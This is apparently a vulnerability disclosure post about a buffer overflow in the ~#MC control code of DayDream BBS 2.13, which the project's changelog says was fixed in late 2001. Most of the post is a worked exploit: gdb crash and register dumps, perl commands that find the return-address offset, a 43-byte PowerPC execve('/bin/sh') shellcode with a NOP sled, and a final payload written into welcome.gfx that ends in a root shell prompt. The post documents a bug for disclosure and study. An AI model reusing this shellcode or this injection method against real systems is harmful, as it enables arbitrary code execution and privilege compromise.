Here is some information on a hole that was Fixed in Daydream BBS's last
revision.
There are a few changes in the Daydream BBS change log that I thought were worth mentioning:
2001-12-29 Hannu Lyytinen <hlyytine@cs.uku.fi>
* text file control codes ~#MC, ~#TF and ~#RA were
vulnerable to buffer overflow attack. Although there
are no known exploits, an attacker could run arbitrary
code on whatever UID DayDream was running on.
2001-12-27 Hannu Lyytinen <hlyytine@cs.uku.fi>
* fixed buffer overflow bug in ~#MC command.
Now here is a little background about these issues...
/root/daydream-2.13/docshtml/setup.html:
You can have the following control codes in your text files
Action codes
~#MC[COMMAND]|
Menu command
~#TF[FILE]|
Show textfile
~#RA[FILE]|[max]|
Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
number (1-[max]).
Well heres my first attempt to exploit this ... looks UGLY.. the stack
was totally obliterated!@#@ I have never seen destruction like this to
my ppc stack. *grin*
Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()
(gdb) bt
#0 0x41414140 in ?? ()
(gdb) i r
r0 0x41414141 1094795585
r1 0x7fffda90 2147474064
r2 0xd3fec000 -738279424
r3 0x1 1
r4 0x10053890 268777616
r5 0x100538a0 268777632
r6 0x10 16
r7 0x2 2
r8 0xff87d10 267943184
r9 0x10040000 268697600
r10 0xff87d10 267943184
r11 0x0 0
r12 0x2 2
r13 0x10047440 268727360
r14 0x0 0
r15 0x7ffff874 2147481716
r16 0x1 1
r17 0x10040000 268697600
r18 0x10040000 268697600
r19 0x10040000 268697600
r20 0x10040000 268697600
r21 0x10040000 268697600
r22 0x10040000 268697600
r23 0x41414141 1094795585
r24 0x41414141 1094795585
r25 0x41414141 1094795585
r26 0x41414141 1094795585
r27 0x41414141 1094795585
r28 0x41414141 1094795585
r29 0x41414141 1094795585
r30 0x41414141 1094795585
r31 0x41414141 1094795585
pc 0x41414140 1094795584
ps 0x8d032 577586
cr 0x28822828 679618600
lr 0x41414141 1094795585
ctr 0x0 0
xer 0x20000000 536870912
This was accompilshed by the following ...
[root@linuxppc bbs]# cat display/iso/welcome.gfx | more
~#MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<9000 A's>|
The sweet spot is here...
[root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1596'`\|>
display/iso/welcome.gfx
Ignore my username here ... I was trying to mess with format issues if
any existed...
[root@linuxppc bbs]# ./daydream
DayDream BBS/Unix 2.13
Programming by Antti Häyrynen 1996-1997, DayDream Development Team
1998-2001
You are connected to node #10 at 57600 BPS.
ˇ| All accounts deleted - login |ˇ
:| as NEW! |:
.:| |:.
. ....:::| NEW / CHAT / LOGOFF |:::.... .
`------------------------------'
Username: %p
Password: **
Segmentation fault (core dumped)
(gdb) bt
#0 0x0fece418 in free () from /lib/libc.so.6
#1 0x1001e3f0 in dotype (filename=0x58550 <Address 0x58550 out of
bounds>,
flags=35) at typetext.c:639
#2 0x1001d0c4 in find_and_type_file (name_comps=0x100537d0,
flags=1094795585)
at typetext.c:284
#3 0x1001d2ac in typefile (filename=0x7fffdbb0 "", flags=35) at
typetext.c:348
#4 0x1001d3c8 in TypeFile (typethis=0x1002a2dc "welcome", flags=35)
at typetext.c:380
#5 0x10009b48 in enterbbs () at enterbbs.c:102
#6 0x10003124 in getin () at daydream.c:401
#7 0x10002e9c in visit_bbs (m=0) at daydream.c:310
#8 0x10002b24 in visitbbs (m=0) at daydream.c:210
#9 0x10002a98 in main (argc=1, argv=0x7ffff864) at daydream.c:198
#10 0x0fe71b90 in __libc_start_main () from /lib/libc.so.6
Now we feed it some more to find the Instruction Pointer
[root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1614'`\|>
display/iso/welcome.gfx
echo "~#MC"`perl -e 'print "A" x 1615'`Z\|> display/iso/welcome.gfx
Program received signal SIGILL, Illegal instruction.
0x41414158 in ?? ()
43 byte shellcode...
"\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68"
leaves 1572 bytes in the buffer. or 393 nops plus need for one pad char
heres our first try ...
[root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print
"\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68"
x 1'`A`perl -e 'print "\x41\x41\x41\x41"'`\| > /home/bbs/display/iso/welcome.gfx
Our return is in $r1
(gdb) x/10s $r1
0x7fffda90: "/shAAAA"
Lets find the start of the nops
(gdb) x/10s $r1-1615
0x7fffd441: "˙Ú\220\020\001Ö´`iii`iii`iii`iii`iii`i
Here is perfect nop alignment.
(gdb) x/40x $r1-1608
0x7fffd448: 0x60696969
0x7fffd448 is where our code lies sp lets change the return in our mal string
[root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print
"\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68"
x 1'`A`perl -e 'print "\x7f\xff\xd4\xd8"'`\| > /home/bbs/display/iso/welcome.gfx
ˇ| All accounts deleted - login |ˇ
:| as NEW! |:
.:| |:.
. ....:::| NEW / CHAT / LOGOFF |:::.... .
`------------------------------'
Username: %p
Password: **
sh-2.05#
-KF
